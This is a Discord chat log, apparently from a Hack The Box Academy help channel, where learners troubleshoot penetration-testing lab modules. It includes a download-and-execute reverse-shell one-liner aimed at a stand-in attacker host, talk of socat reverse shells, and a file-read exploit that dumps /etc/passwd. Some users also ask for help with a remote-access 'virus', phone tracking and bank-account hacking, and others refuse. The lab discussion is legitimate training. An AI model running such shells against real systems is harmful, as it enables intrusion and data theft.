#modules

1 messages ยท Page 104 of 1

clear hatch
#

thanks

quiet ember
#

<ip> ns.inlanefreight.htb in /etc/hosts and ns.inlanefreight.htb in your resolvers.txt

clear hatch
#

okay

rustic arrow
#

You can run curl -H 'Host: subdomain.domain.htb' domain.htb to test if there's A/AAAA records, for example.

lapis lion
#

Does the HTB cert have any real acceptance, or is more for personal gain?

acoustic owl
rustic arrow
quiet ember
rustic arrow
#

If you add a name as a resolver, another resolver needs to resolve it to an IP address

#

Who watches the watchman, right?

#

@acoustic owl I'll leave it to you to reply Dom :). Also, @lapis lion you should use #cpts

lapis lion
#

Sorry I am new to this discord, still figuring out which chats go where, ty !

rustic arrow
lapis lion
clear hatch
#

can we not post screenshots here?

acoustic owl
clear hatch
#

permission to DM someone?

quiet ember
lapis lion
#

ahhh so it is a pathway.. nice!!

#

Thank you for the link @acoustic owl I appreciate it !

acoustic owl
#

@clear hatch You must not mention so many people at once. The police bot does not like that ๐Ÿ˜‰

rustic sage
#

The name server exists on your host. The /etc/hosts file is what it users to resolve domain names

rustic sage
rustic sage
#

I believe could be wrong ๐Ÿ™‚

acoustic owl
rustic sage
#

are there any specific certain for internal network penetration? nothing to do with web

acoustic owl
rustic sage
#

just need a certification

acoustic owl
prime leaf
#

bruh, I can only log into the academy part of htb for some reason

acoustic owl
#

This is normal.
For the main platform you need another login

prime leaf
#

thats....

#

ok then...

#

๐Ÿคจ

subtle flicker
#

Hey! i'm on shells & payloads module, on final assessment.
I understood what the exercise is asking to do, but in order to do it it is not required to access a web browser? Because i can't find one in the foothold machine. Am i being dumb or we have to do the assessment without accessing a web browser?

acoustic owl
#

open a terminal and type firefox.

#

This should help

subtle flicker
#

Alright thanks i was cURLing all the way ๐Ÿ˜‚

supple radish
#

And I have ssh onto the machine as sam from the prevous modules

#

I found the backup files and kiras ssh files but neither of them i can actually do anything with

#

What am I missing?

zinc marsh
#

Someone who use ligolo-ng?

#

for double-pivoting the 0.0.0.0 should be my ip? or it is 0.0.0.0

thorn urchin
trail leaf
#

The 0.0.0.0 makes it listen on all interfaces

vocal tusk
#

hi hys im doing Web Attacks Mass IDOR enumeration and i cant find any files under /documents for any employee at all its empty i did the first 2k employeess in case it was a trick and they where scattered but nothing

#

nvm burp was bloking stuff

trail leaf
#

It's a bit weird because you're doing it over a VPN on HTB's network, normally you could just do nslookup IP and it would work

#
#

Here's a good example of using nslookup and specifying the server

brittle herald
#

Module: Network Enumeration with Nmap
Chapter: Firewall and IDS/IPS Evasion - Hard Lab
Description: I need some guidance on how I'm supposed to be enumerating the services. ||First I ran a simple -sT scan with default settings and I received ports 22 (ssh) and 80 (http) open. I then ran another scan across all ports and got the same result. After that I ran a -sU scan with options -Pn and -n, which found net-bios running on port 137. I enumerated all of the ports I found (22, 80, and 137) with --script vuln,discovery,auth,version, with nothing conclusive found. On port 80 the directories found returned 403 forbidden. I'm at a bit of a loss, I think the only real options I could have missed is the speed of the scan and wait time values. I ran most of the above scans with --packet-trace and couldn't find much.|| Am I overlooking something, or is there a different approach to take?

vocal musk
#

Still confused about your syntax remark. I see what control enterprise admins has over the domain object but I can't get it to accept any of my answers. ๐Ÿ˜ฆ

mortal shadow
quiet ember
brittle herald
quiet ember
pine dagger
#

First 3 letters are capitals, remaining are lower case.

brittle herald
# quiet ember Sure thing, let me know if you need anything else

I'm still having a hard time, I'm running variations of
||sudo nmap --script version -sU -p 22,80,137 -g 53 10.129.226.151 --max-retries=0 -Pn -n --disable-arp-ping --stats-every=10s --packet-trace||
It looks like I'm getting the same results, so I may just not have a very keen eye for what it wants me to find.|| I can only get the version of the web server and ssh.||

quiet ember
fathom pendant
#

nslookup domain ip

fathom pendant
#

That will clue you into the type of scan it wants

brittle herald
fathom pendant
#

I've done quite a bit of command tinkering on this

brittle herald
#

Sounds like it, now I wonder if that technique will work through all of the modules. This was a very fun expirience

fathom pendant
brittle herald
fathom pendant
#

Always. Break the command down to the bare minimum

#

It's because there's a specific domain it wants you to enumerate

fathom pendant
#

This has nothing to do with academy, see #rules and #welcome on how to view other parts of the server

brittle herald
#

||IPSs will limit the traffic rate and block it if it becomes too much, maybe it's a speed issue? The IP address isn't blocked, I can still run my scans and get a result, so I think it's just a regular firewall. Is it possible to configure NC to ignore ICMP responses like destination unreachable?||

fathom pendant
#

I'm not at home to check my notes but remember you're looking for the source of your port issues

brittle herald
fathom pendant
#

It happens

civic fiber
#

Anyone do SQLmap essential skill assessments?

fathom pendant
#

Plenty of people have

#

Just ask your question regarding what you're stuck on and what you've tried?

civic fiber
#

Yes wait

#

What I did wrong here?

#

event I follow still error.

#

Lab issue?

proud pine
#

Is that... a spoiler channel, showing academy content?

civic fiber
trail leaf
#

so you're telling me you saw the answer ๐Ÿค”

civic fiber
#

I saw but I not copy it.

proud pine
#

You just pasted spoilers here lol

civic fiber
#

I trying what I did wrong with my own idea

proud pine
#

I dunno how HTB hasn't taken that down already

civic fiber
#

ok removed

#

oh I use wrong command

#

--temper > --tamper

thorn urchin
sharp quartz
#

guys i'm having trouble connecting to hackthebox's vpn

acoustic owl
rare topaz
thorn urchin
#

yeah I know, just clarifying thats what someone posted here lol

woven copper
#

Hi there, anyone could help me with BloodHound Skill Assessment final question about percentage of users with a path to GLOBAL ADMINISTRATOR. I think had identified the AZUsers , but all my answers were wrong. thanks an advance

acoustic owl
# woven copper Hi there, anyone could help me with BloodHound Skill Assessment final question a...

Here is a cheat sheet.
There you will find the query and only need to convert it to Azure
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

Bloodhound uses Neo4j, a graphing database, which uses the Cypher language. Cypher is a bit complex since itโ€™s almost like programming with ASCII art. This cheatsheet aims to cover some Cypher querโ€ฆ

rich perch
#

What is the answer to this question in the Bug Bounty Hunting Process module?? It's talking about the CWE & CVSS score. Is it not Attack Vector? I tried so many different combinations of writing it but it just doesn't work

rich perch
#

time to try like 100 different ways of writing the same thing

umbral wigeon
#

make sure u dont have any trailing spaces

rich perch
#

nvm I got it, it's just "Adjacent" all by itself. I guess I'm just being stupid. Thank you for the help @umbral wigeon

round gale
#

Hello, in the Footprinting Module(DNS Section), there is a line ". However, other DNS servers may be configured differently and, in addition, may be permanent for other zones." . what does DNS may be permanent for other zones mean, i didnt understand that part

fathom pendant
#

This seems like a translate issue

#

Are you translating the page?

round gale
#

no

fathom pendant
#

Ah I misread it I thought you only shared the sentence fragment

round gale
#

the last line of the paragraph. i dont understand it

fathom pendant
#

It just means that there can be multiple dns servers for multiple zones

round gale
#

how do you define a zone?

fathom pendant
#

Google it

round gale
#

k

vast geyser
#

Hi,there , I have a concept question about the ssh tunneling.
There is a 10.129.15.50/172.16.5.129 host which open the 3306 port.
And my host IP is 10.129.15.51.
I want to forward of local port 1234 to 3306.
Then, this is correct command
ssh -L 1234:localhost:3306 ubuntu@10.129.15.50
But why can't I use the below command?
ssh -L 1234:10.129.15.50:3306 ubuntu@10.129.15.50

Because we can use
ssh -L 1234:172.16.5.130:3389 ubuntu@10.129.15.50
which 172.16.5.130 is another host in the 172.16.5.0/24 subnet.

knotty panther
#

Hi I have password attack hard lab question
I had samdump2 the dump file from encrypted VHD and got Administrator Hash.. but not be able to Pass the hash login anywhere.. am I missing anything

rustic sage
#

hello

#

can some one help me

#

how do i get wlan my internet ip in kali

knotty panther
rustic sage
#

yes my kali is in NAT

#

so how to change it

#

yeah isee it

#

my kali is set on NAT

#

i wanna change it ??

vital adder
#

but the answer for your question is a google search away so do that first

rustic sage
#

i am verifying

vital adder
rustic sage
#

i cannot find my hash where it was

novel matrix
#

please keep this channel on topic. thank you ๐Ÿ™‚

knotty panther
quick cloud
#

If anybody wants to develop a note taking methodology using obsidian I have some great resources that has helped me make very good notes

rustic sage
knotty panther
rustic sage
#

i am making a file which access any pc for some study purpose and installed it on my another laptop which has wifi in it but dosent work in

#

because i set my ethernet ip on that virus file

#

so i think that i wanna put my wlan ip so it will connect then

#

but i cant find it on when i text ip addr or ifconfig in terminal it doesnt show

knotty panther
#

your not with the topic of the room

vital adder
knotty panther
#

Mr.hacker before you try to virus or do big thing.. go back study more on networking and such

rustic sage
#

yeah you are right

knotty panther
#

it don't work that way like you think

rustic sage
#

i just wanna study about networking

knotty panther
#

try youtube fundamental is everything

vital adder
#

for the password attack hard lab?

#

shoot me a dm with what you got

quick cloud
#

@vital adder yes

knotty panther
vital adder
#

a tips for that is red bull

wraith sable
#

anybody done the JavaScript Deobfuscation module? my answers arent right i think, but im wonderin gwhere im messing up\

cosmic gazelle
#

Can anyone help me with the question "How many total packages are installed on the target system?" on Linux Fundamentals - File Descriptors and Redirections?
I searched and it seems the answer is something like "dpkg -l | grep 'ii' | wc -l" but I don't see the lesson mention dpkg anywhere

wraith sable
#

i dont think there's much in the lesson on it (i dont remember tbh)

cosmic gazelle
#

I saw the cheat sheet but I assumed there would be a way to get the answer without using dpkg so I wasn't sure if I should open it
At first I tried something like:
find / -type f -name *.dpkg 2>/dev/null | wc -l

Thanks @wraith sable

wraith sable
# vital adder what's the issue?

the answers im getting to the decoding and skills assessment questions; for decoding im getting the 'secret message' from the hash but neither the secret message or the other key im getting work for the answer

#

mind if i send a screenshot? it'd explain better lol

vital adder
#

sure shoot me dm

obtuse niche
#

Hiya lovely peeps ๐Ÿ˜„
I've encountered a bit of an issue and I can't seem to figure out if I'm doing something wrong or if LOLBAS is out of date.
I'm currently going through the "Living off the Land" section of the file transfer module, and it mentions using "certreq" to make post requests to a netcat listener. LOLBAS also mentions the use of this "-Post" parameter for certreq.

However, when I'm attempting it on the windows VM provided in the optional exercises section, I'm getting a " The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)" error message. My googling hasn't been able to find me the solution, so I was wondering if you guys would know ๐Ÿ™‚

proud pine
obtuse niche
dreamy zealot
proud pine
#

If it did exist, it's likely it doesn't anymore.

obtuse niche
proud pine
#

Looking through the channel history, this seems to have come up before a couple times, with the same answer.

obtuse niche
pine dagger
vocal tusk
#

hi guys quick question if someon can help please and thank you. in the screnshot there is a scriot i took scrypt and ran it after i changed target port and ip. but i cant re create the result im getting a file called download.php that contains text 'contract is not defined'. i thought in course material we should be able to at least recreate what they show us. NVM they show a harder way in the text but in reality its way easyer..

warm drift
#

trying to add 50064.rb exploit to metasploit on remote machine to in shells and payloads module but when I run "updatedb" or " sudo updatedb" it doesn't work

acoustic owl
wild dragon
frozen mesa
west spindle
#

Hi,

In Dacl Attacks Skills Assessment, I'm stuck on the 4th question, What's Jose's NTLM hash? I checked BloodHound, I didn't find anything.... I am confused any hint?

vocal tusk
rustic sage
#

Can i show my answer on someone who passed linux privilege escalation to see if my answer is correct I'm on section linux services and internals enumeration i type the answer but shows me The wrong answer

pine dagger
fathom pendant
fathom pendant
#

Short answer no. You said you're typing the answer, why not copy/paste the answer

rustic sage
#

I try anything

#

So far it has given me a few boxes right answers wrong

grizzled wind
fathom pendant
#

Refresh page and try again. Also read the question carefully to make sure you're answering the question properly

rustic sage
#

Refresh it several times

rustic sage
#

That's why i just ask to type someone what i type as answer to tell if I'm wrong or the box is buggy

fathom pendant
#

What is the question asking?

rustic sage
#

What is the latest python version that is installed on the target

west spindle
# grizzled wind try harder.

Slava Ukraini.. but this is not a hint ๐Ÿ˜‰ If you don't have real answer please don't answer because i'm focusing on the lab

frozen mesa
fathom pendant
grizzled wind
fathom pendant
rustic sage
#

Whereis python, then type /usr/bin/python3.11 --version

fathom pendant
#

Why not do which python

wild dragon
fathom pendant
#

Have you tried to just use it?

rustic sage
fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

#

Usually python though has subversions

rustic sage
#

And what is the differences

fathom pendant
#

3.11.x.x

#

3.11 is just the major version release

rustic sage
#

Yes i typed it with subversions

#

Not just 3.11

fathom pendant
#

Are you typing 'python {version}' or just '{version}'

rustic sage
#

I tried both

#

Both doesn't work

west spindle
# wild dragon text me if you want my hand

Thank you! Oh, yesterday definitely I was sleepy because i didn't see it thank you again.... I will check it and then if it didn't work i'll ask you in private ๐Ÿ™‚

fathom pendant
#

Weird

#

I haven't done this one

wild dragon
rustic sage
fathom pendant
#

And currently not able to check it or run it

fathom pendant
# rustic sage ๐Ÿ˜Ÿ

If you utilize the discord search feature though you can see if someone else has asked the same question. Just don't forget to do in:modules in the search query

west spindle
#

it was really easy but maybe I had a overthinking ๐Ÿ˜„

fathom pendant
#

:)

#

But yeah, in future, search first and see if it was answered

#

Saves a lot of time

rustic sage
#

Ok, thanks for your time

west spindle
# wild dragon yes, just text me, feel free, bro

thank you prob I finished it ๐Ÿ™‚

https://academy.hackthebox.com/achievement/75267/219

It's really recommended module

sly reef
#

How is it listening to the same port?

supple radish
sly reef
#

damn, i was reading it like
statment
command

statment
command

sly reef
#

thanks

supple radish
sly reef
burnt trail
#

Hello, Im currently in the last section (859) of the module 77 (getting started). the task is: "Spawn the target, gain a foothold and submit the contents of the user.txt flag. " The webapp is running a vulnerable version of GetSimpleCMS. I also did enumeration to get hidden pages and found the admin login panel. however i have no idea where i can find the password, but i found an API Key which can be used (https://www.exploit-db.com/exploits/46880 - "however authentication can be bypassed by leaking the cms API key to target the session manager"). But how can i target the session manager now?๐Ÿ˜…

trail leaf
#

Attacking Enterprise Networks

sly reef
trail leaf
#

it's a very roundabout method to stablilize a shell imo, but I've definitely done worse

sly reef
trail leaf
#
  • <VULNERABILITY> lets you run a socat reverse shell on the target, which the attacker recieves with netcat, listening on 8443
  • Then, to stabilize, the attacker starts a new socat listener on 4443, and uses the reverse shell on 8443 to submit a new socat command to connect to the 4443 listener
sly reef
#

which comand is redirecting the shell?

#

have not used socat in my life

trail leaf
#

There's no redirecting, it's literally just getting a reverse shell, and then using the reverse shell to get a better reverse shell

sly reef
#

oh my god

#

im idiot

trail leaf
#

no, this example is just really confusing

#

I assume they do this to get around constraints by exploiting <VULNERABILITY>, but this is still kind of convoluted

sly reef
#

command injection was with filters so yeah, easier

#

well man, thanks for taking your time ๐Ÿ™‚

supple radish
#

your ahead of me lol I was beyond confused when i looked at it for a second time

burnt trail
trail leaf
#

The weirdest thing about it is that having to run the reverse shell twice kind of defeats the purpose of using socat imo. I haven't done the module, so I don't know if there's anything weird with that box, but I feel like an nc mkfifo or even a curl http://ATTACKER_IP/rev.sh|bash would have worked

sly reef
trail leaf
burnt trail
#

or nevermind

#

@sly reef

#

pass was "admin"kek prayge

sly reef
#

xD

fallow delta
#

who can help me decode a secret code please?

sly reef
fallow delta
#

like secretcode=....................................................

sly reef
#

dude we need context

fallow delta
#

i want decrypt the secret code i don't know how to do that

fallow delta
sly reef
#

where is this code being used, which is the code

fallow delta
#

did you see @sly reef ?

fallow delta
sly reef
#

yeah

fathom pendant
#

This has nothing to do with htb academy please keep things related to that

west night
#

Hi @fathom pendant . Pertaining to "Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory" from the "Pass the Ticket (PtT) from Linux" in the Password Attack module. It appears the credentials do not work. I ran ssh command in verbose mode there was a successful server connection. Additionally, I verified this with traceroute the htb vpn connection 10.10.14.50, connected to 10.10.14.1 then to the target ip address. I copied and pasted the credentials and double checked and they were correct.Yet when I entered them I keep getting the error, "Permission denied (publickey,password)". No idea what I am doing wrong...

fathom pendant
visual ingot
west night
#

Solved it:
"Scenario

To practice and understand how we can abuse Kerberos from a Linux system, we have a computer (LINUX01) connected to the Domain Controller. This machine is only reachable through MS01. To access this machine over SSH, we can connect to MS01 via RDP and, from there, connect to the Linux machine using SSH from the Windows command line. Another option is to use a port forward. If you don't know how to do it, you can read the module Pivoting, Tunneling, and Port Forwarding."

#

Basically, had to use credentials from the previous section and then ssh from that machine....

obtuse fiber
#

Hello All, just reminder as it just happened to me.
IG you are stuck in Information Gathering - Web Edition module, at Information Gathering - Web - Skills Assessment section last question which is "Perform subdomain enumeration against the target githubapp.com. Which subdomain has the word 'triage' in the name?"
And you have been using sublist3r then you properly won't find that right subdomain as I assume that the requird subdomain have been removed and I haven't got any luck with sublist3r. What I can recommend is using https://subdomainfinder.c99.nl/ as suggested by @vital adder.

hazy grotto
#

Can anyone help me with Linux Priv module SUDO section?

vocal pier
#

Hey guys

fathom pendant
vocal pier
#

Who here

hazy grotto
#

wow

vocal pier
#

Loll

#

Where u from

fathom pendant
#

Though your username suggests you have no idea what any of this is

vocal pier
#

๐Ÿ‘

#

Okay

fathom pendant
rotund sphinx
#

hi, im having some issues with the skills assessment for shells and payloads module, i have managed to upload some payloads to host 1 (both manually + with msfconsole) and they are being uploaded and showing in the dashboard as running but when i try to navigate to the url to activate them im just getting 404s

fathom pendant
#

Are you sure you're navigating to the right url. You might be one or two directories too deep. I struggled with this too

rotund sphinx
#

im clicking the link from the manager page

rustic sage
#

Hi guys I have a question I don't know if I am right I should find an exploit and capture the flag for this question but I don't know if I am right.

#

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start) --Module gettinStarted

#

This is the exploit I found but I don't know if I'm right.

#

Exploit: MyServer 0.4.3 - Denial of Service
URL: https://www.exploit-db.com/exploits/94
Path: /usr/share/exploitdb/exploits/multiple/dos/94.c
Codes: OSVDB-2808
Verified: True
File Type: C source, ASCII text

#

Can someone verify if this is correct so I can continue because I have not found the question.

rotund sphinx
#

i dont think you want a denial of service

rustic sage
#

Perform the search in the following way
searchsploit 94.237.54.69 -p 31249

winter blaze
#

hello i got a question but can someone help me in private to avoid making a spoiler of the SQL module ? it's about the email of otto lang

autumn pilot
#

with searchsploit you need to search based on vendor/package not an IP address

rustic sage
#

So it is not that way to perform the search.

fathom pendant
#

First: because it's a DOS exploit. So definitely not correct.
Second: just identify the services by running an Nmap scan first and seeing if there's other ways to interact

fathom pendant
rustic sage
#

I ran it through nmap but did not know how to approach to start the capture.

autumn pilot
#

Capture of what?

fathom pendant
#

Well it seems like a public exploit. Perhaps visiting the website will be useful

rustic sage
#

the answer

#

This is what I found with nmap because I had already done a scan but didn't know how to approach it

#

19/tcp filtered chargen
22/tcp open ssh
139/tcp filtered netbios-ssn
55600/tcp open unknown

autumn pilot
#

Start simple - visit the target

fathom pendant
#

If I'm remembering it is a web page ( http://ip:port

rustic sage
#

If it is wordpress

rotund sphinx
#

my note taking wasnt great for that module but i think there is a decent chance the exploit you need is one of the ones discussed in the module

fathom pendant
balmy radish
#

Look up how to do an nmap scan in the modules again to get more info

rustic sage
#

Searching for exploit pos ssh will be the answer

#

I mean I did a scan with the port in conjunction with other ports and I don't know how to search for the exploit.

autumn pilot
#

The target spawns with a port that is given

#

It is not required to scan the whole target's ports

fathom pendant
#

^

#

Whenever a target gives you a port it is reasonable to assume they want you to focus on that

rustic sage
#

I'm a bit lost with the question

#

I focus only on the specified port?

autumn pilot
#

Yes.

rustic sage
#

wow

rotund sphinx
#

in general though when your looking for exploits you want file upload/download or remote code execution, not denial of service

the goal is to extract data from the target machine, not just crash it

rustic sage
#

34164/tcp closed unknown

rotund sphinx
#

open it in a web browser

gloomy hawk
#

Hello, any hint for Password Attack module? ๐Ÿ˜ฅ

fathom pendant
#

Or rockyou

balmy radish
#

Do not try to dos their server running the docker container

gloomy hawk
#

I mutate 4 list AND none

fathom pendant
gloomy hawk
#

Ftp, smb :/ none

fathom pendant
#

You're not really providing much info for me to actually be helpful

#

What section are you working on

rustic sage
#

What I also want is to find it by my own means and not be given the answer easily.

#

gettin started

#

module public exploits

rotund sphinx
#

there are multiple conversions going on here :p

fathom pendant
#

Literally that's 90% of the work

vestal dust
#

@fathom pendant I have been doing Hackthebox for the past 6 months and now I am in hacker rank so next shall I subscribe to the VIP or shall I go with the academy premium?

fathom pendant
rotund sphinx
vestal dust
#

Can you suggest which is best for learning

rotund sphinx
#

your asking the question in an academy channel :p

fathom pendant
vestal dust
#

Ok bro I am a student so what steps I should do to claim the voucher

fathom pendant
#

You mean Academy subscription discount?

rustic sage
#

I think I found the exploit Simple Backup Plugin 2.7.10

vestal dust
#

Yes for discount for students

fathom pendant
#

If you didn't sign up using your academic email, message support

vestal dust
#

Ok

#

Thank you bro

fathom pendant
rustic sage
#

That's what I'm going to do I'm going to search rapid7 and continue the adventure

vocal pier
#

Hey

#

I would like to study

fathom pendant
#

Then do it

#

ยฏ_(ใƒ„)_/ยฏ

compact patrolBOT
vocal pier
#

Thanks ๐Ÿ™

rustic sage
#

I have found this for the moment and I think I have to look for the answer. @fathom pendant

#

/home/kali/.msf4/loot/20230715213516_default_94.237.62.173_simplebackup.tra_907693.txt

fathom pendant
#

But that probably is correct

#

No

vocal pier
#

Why

valid cipher
#

what is orange account

acoustic owl
fathom pendant
vocal pier
#

Why

#

Your sorry

fathom pendant
hazy grotto
#

how do you flag a serious rule break again?

#

@urban sage

This guy DM'd me after being told no here and is asking me how to hack bank accounts.

#

Please ban this guy

#

@sterile hawk

obtuse niche
#

xD

rustic sage
#

ajjajajajjajaj

#

@fathom pendant I have found the vulnerability but I can't find the flag.txt

#

exploit Simple Backup Plugin 2.7.10

fathom pendant
rustic sage
#

msf6 > use auxiliary/scanner/http/wp_simple_backup_file_read
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > show options

#

set RHOSTS 94.237.54.69
RHOSTS => 94.237.54.69

#

set RPORT 31249
RPORT => 31249

rotund sphinx
#

what other options are there?

rustic sage
#

run

#

20230715213516_default_94.237.62.173_simplebackup.tra_907693.txt

#

root: 0:0:root:/root:/bin/bash
daemon: 1:1:daemon:/usr/sbin:/usr/sbin/nologin

#

I found something like this but not flag.txt

rotund sphinx
#

that looks like /etc/passwd, what options does the exploit have for you to configure it?

hazy grotto
rustic sage
#

In the source code of the page appears the plugin used and with the search in rapid7 I have found how to use it but when I scanned it I get a completely different file than the one I need.

urban sage
rustic sage
#

i will review advances options

#

this is explit use auxiliary/scanner/http/wp_simple_backup_file_read

rotund sphinx
#

what options does it have?

sly reef
#

ATTACKING ENTERPRISE NETWORKS | Active Directory Compromise

I need to obtain SID from Server Admins but the command is not outputting anything... $group = Convert-NameToSid "Server Admins"

any ideas?

trail leaf
#

The $group is you saving it as a variable

#

Do Write-Host $group

hazy grotto
sly reef
#

restarted the lab

#

working now

#

weird

worthy laurel
#

Linux Privilege Escalation - Sudo Module
Can't figure out how can I read flag.txt or elevate my privilege?

sly reef
#

sudo -l + GTFO bins

#

i guess

worthy laurel
#

I have run 'sudo -l' but still have a problem with elevating privilege using ncdu.

timber ore
#

thanks @thorn urchin , i spent hours enumerating, got many hashes, passwords, usernames, compormised machines, priv esc,Rubeus, tickets, mimikatz.........

untill your hint got me do it in few mins _(ใƒ„)_/ยฏ

zinc marsh
#

someone need help with anything?

maiden spindle
#

@zinc marsh Hey, I just posted in community-help. Not exactly a module question issue, just struggling a little with my VM configuration. i don't know what's wrong with activate-global-python-argcomplete

thorn urchin
winter blaze
#

can someone please help me with MSSQL question ?

#

i cant paste what i tried here

#

it's involving the enumeration part from Footprint module

#

aiudaaa

#

xdd

#

Damn it !

#

XD

#

<@&861185840277487616>

raw venture
#

Module name: Attacking Common Application
Section name: Attacking Thick Client

Anyone have encountered this issue? When I tried to deselect the Delete subfolders and files and Delete
I got the following error when I re-run the Restart-OracleService.exe

The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
'c:\programdata\restart-service.exe' is not recognized as an internal or external command,
operable program or batch file.
Could Not Find c:\programdata\restart-service.exe

I have no idea if I did it wrong or if I'm missing something.

novel matrix
#

Dealt with

bright arrow
#

How often do you mods receive a thank you?

fathom pendant
#

I'm sure it's a ratio of 10:1 of "fuck you":"thank you"

winter blaze
winter blaze
#

:C

fathom pendant
#

Whats the actual question

winter blaze
#

can i send you a private message

#

?

fathom pendant
#

Also if you verify through the instructions in #welcome you can paste screenshots

#

I'm at work and about to be off break

winter blaze
#

yes but i can not paste the output

#

i will be quick i swear

#

:CCCCc

fathom pendant
#

Brother verifying will also help with that

winter blaze
#

TT-TT

mild dome
#

there's something wrong with my python web how do i fix it? i cant code anything there

winter blaze
#

xd

native void
#

is there anyone who can trace the location of someone via mobile number because someone has cheated me please?

rustic sage
#

.htb is intended

zinc marsh
native void
native void
zinc marsh
rustic sage
#

did you add that domain name to your hosts file?

#

ah, I didn't see that before

zinc marsh
#

but what is the doubt

native void
#

Suspect

rustic sage
#

I don't have notes on this section, I have some rusty commands left from that section

#

I can share a little hint but you gotta figure out the rest if you want to...

zinc marsh
#

htb is not a TLD

trail leaf
#

.com works because I'm pretty sure they own an inlanefreight.com domain for the corporate osint module

zinc marsh
#

but I haven't notes

#

but I think subbrute only worked with TLD and I don't remember if you could add .htb manually

fathom pendant
#

Because .com is an actual registered domain

#

But it's not going to give you the answers you're seeking @rustic sage in fact I gave you the format for the answer

zinc sentinel
#

hello any advise on how to fix this metasploit error please?
im on tail end of windows priv esc part 2 but shells are being weird, timing out/ no response ?
iv ran msfdb reinit

zinc marsh
#

this feeling sadglas

#

after all day trying the overflow

zinc sentinel
#

Great success

zinc marsh
#

well I use it for the eternalblue and that's all

ebon sapphire
#

what is the flag format for Documentation & Reporting in regards to the steve needing to split screens? I've tried every combo based on pressing ctrl-b and release the keys and then pressing the % key, so I thought the flag would be [Ctrl] + [B] + [%] and it is incorrect

rustic sage
#

what is mean +2 in the lower table

prisma spruce
rustic sage
prisma spruce
#

that table is pretty bad tbh

#

The IPs columns refers to the number of addresses per subnet, and not the actual number of IPs,

#

And teaching classful networking in this day and age is... bad

rustic sage
prisma spruce
# rustic sage can you send the table which using nowadays?

Classless Inter-Domain Routing (CIDR ) is a method for allocating IP addresses and for IP routing. The Internet Engineering Task Force introduced CIDR in 1993 to replace the previous classful network addressing architecture on the Internet. Its goal was to slow the growth of routing tables on routers across the Internet, and to help slow the rap...

rustic sage
prisma spruce
trail leaf
#

it's also explicitly given in the text

zinc sentinel
#
fathom pendant
#

BTW that's not even needed

#

You can just do nslookup domain ip

acoustic owl
rustic sage
#

guys i do not understand this
according to my understand subnet when octet has number it is refer to network adreess and host adrress must bigger than this number

rustic sage
prisma spruce
# rustic sage is not this number which i make aound it red circle bigger than 192?

A subnet mask of /26 is 11111111.11111111.11111111.1100000, You take the bitwise AND of that mask with the ip address in binary. Of importance here is the last octet, so a bitwise and would AND 11000000 with 10100000, which results in 10000000. That corresponds to 128, so the network has addresses from .128 to .191 (/26 corresponds to 256/2^2=64 addresses, and there are 64 addresses from .128 to .191 (inclusive)

#

I'm not really sure what you're asking by "bigger than 192"

#

Often you'll see 192.168.12.128/26 to refer to the subnet, but you might also see 192.168.12.160/26 to refer to the host and the subnet

acoustic owl
#

This is because htb cannot be resolved from the root nameserver. You could have just used the IP address instead. dig www.inlanefreight.htb @10.10.10.10
Then you don't need an entry in the hosts file either

fathom pendant
#

I also think he's misunderstanding what I'm meaning by domain in the context

#

Domain is inlanefreight.htb and ip is spawned ip

prisma spruce
flat stump
#

hi

sleek urchin
rare topaz
prisma spruce
#

Just look up VLSMs.

#

Don't waste your time with videos.

#

People find subnetting difficult because they're bad at math. That's pretty much it.

rare topaz
#

i mean tbh you can just use a calculator

prisma spruce
#

You'll only need to do it manually on the ccna

rustic sage
rare topaz
#

My main point was that the HTB module on subnetting was quite confusing. (at least for me).

External articles and resources explained it better for me.

prisma spruce
#

I should go and check out the other tier 0 modules. So far they have all been poor.

prisma spruce
#

It's pretty easy when you know 256->128->64...

rare topaz
prisma spruce
#

I still think learning process was the worst. I've already ranted too much about that though.

#

Some of the stuff would be hard to teach without actual objectives tbh.

#

If you're not illiterate in tech, then I should be able to tell you what a conf file is, but beyond that there isn't much to say about them if you aren't going out of your way to actually configure them

#

https://news.ycombinator.com/item?id=36466182 stuff like this exists, and it doesn't really make much sense unless you have actually configured something before.

Eduard

Programs should not only report where the configuration files are located, but also report how configuration options contained therein are read in:Some programs use a "last occurrence wins" approach, while other programs (e.g. sshd) use a "first occurrence wins" approach.Buried in https://man.freebsd.org/cgi/man.cgi?sshd_config(5) and awkwardly ...

#

Without that, all the modules basically become fun talking points where they go "this exists, but I won't really elaborate on it in a meaningful way"

#

Of course, knowing something exists is pretty important.

hallow kiln
prisma spruce
#

Yeah. Maybe the tier i-iv modules are good, but the tier 0 modules aren't selling me on it

hallow kiln
#

It's funny when selling you on it is exactly what they're supposed to do

prisma spruce
#

That module basically amounts to "Can you do it? Yes you can!" ...cue Bob the Builder music.

#

You don't even know the pricing structure until after you sign up for academy. I don't know what they're doing. It's as if they don't want my money.

hallow kiln
#

The pricing structure is unnecessarily convoluted

prisma spruce
#

Purchasing the tier i and tier ii modules by themselves is cheaper than silver. I don't know how to express how funny that is.

hallow kiln
#

Yeah, silver seems fairly pointless, I guess the selling point is the 1-on-1 coaching for the annual? There's Google and Discord, that's enough

rustic sage
#

any mods in here?

#

I need help linking my HTB with my discord

rare topaz
minor kelp
#

Currently doing the CPTS path, stuck at pivoting. The SocksOverRDP dll is always getting blocked by the spawned windows system, since it detects it as a virus. Cannot load the plugin with regsvr32.exe SocksOverRDP-Plugin.dll. I confirmed that the firwalls are off, no clue how to continue.

Any suggestions?

prisma spruce
#

You don't get a nobel prize in physics by being bad at math, unless you're comparing them to professional mathematicians.

acoustic owl
minor kelp
rustic sage
#

how the multicast have physical address?

rare topaz
graceful lily
#

Has anybody else had issues installing tplmap.py in the Server-Side Attacks module, section SSTI Exploitation Example 1?

#

nevermind, I got it to work ๐Ÿ˜„

rustic sage
rich perch
umbral wigeon
#

yay

polar widget
vital adder
rustic sage
#

can any mods help me here??

#

this is the only channel i have access to

#

any mods here?

novel matrix
rustic sage
#

i cant link my htb with my new discord

#

i deleted my old discord

novel matrix
#

Wrong channel mate

rustic sage
#

and its still attached to that

#

well which channel should i post it in?

#

as every other channel is closed

novel matrix
pine dagger
#

